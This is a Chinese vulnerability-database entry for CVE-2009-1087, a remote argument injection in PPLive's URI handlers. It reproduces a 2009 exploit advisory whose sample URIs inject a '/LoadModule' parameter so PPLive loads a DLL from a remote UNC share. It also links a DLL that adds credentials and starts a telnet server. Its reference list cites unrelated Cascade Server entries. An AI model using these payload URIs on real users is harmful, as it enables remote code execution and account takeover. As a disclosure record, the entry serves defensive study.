PPLive URI处理器LoadModule参数多个代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117477 漏洞类型 输入验证
发布时间 2009-03-16 更新时间 2009-04-07
CVE编号 CVE-2009-1087 CNNVD-ID CNNVD-200903-431
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8215
https://www.securityfocus.com/bid/34128
https://cxsecurity.com/issue/WLB-2009030236
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-431
|漏洞详情
PPLive是非常流行的P2P网络视频客户端。PPLive的synacast://、Play://、pplsv://和ppvod://URI处理器在评估命令行参数时没有正确地验证URI参数,如果用户受骗跟随的链接中包含有特制的/LoadModule参数的话,就可能导致InternetExplorer加载远程VNC路径所指定的dll。
|漏洞EXP
--------------------------------------------------------------------------------
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog
--------------------------------------------------------------------------------
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/

software description:
"PPLive is a peer-to-peer streaming video network created in Huazhong University
of Science and Technology, People's Republic of China. It is part of a new
generation of P2P applications, that combine P2P and Internet TV, called P2PTV."

vulnerability:
The "synacast://", "Play://" ,"pplsv://" and "ppvod://" URI handlers do not
verify certain parts of the URI before evaluating command line parameters.
This can be exploited against Internet Explorer to e.g. load a dll from a remote
UNC path via the "/LoadModule" parameter, example exploit (IE7):

synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20"
Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"

against older versions:
pplsv://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
ppvod://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"

test dll which adds new credentials / spawns the telnet server:
http://retrogod.altervista.org/9sg_pplive_sh.html

some interesting readings:
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx

--------------------------------------------------------------------------------

# milw0rm.com [2009-03-16]
|受影响的产品
PPLive PPLive 1.9.21
|参考资料

来源:XF
名称:cascadeserver-xlst-command-execution(49332)
链接:http://xforce.iss.net/xforce/xfdb/49332
来源:BID
名称:34186
链接:http://www.securityfocus.com/bid/34186
来源:BUGTRAQ
名称:20090319CommandExecutioninHannonHillCascadeServer
链接:http://www.securityfocus.com/archive/1/archive/1/501981/100/0/threaded
来源:MILW0RM
名称:8247
链接:http://www.milw0rm.com/exploits/8247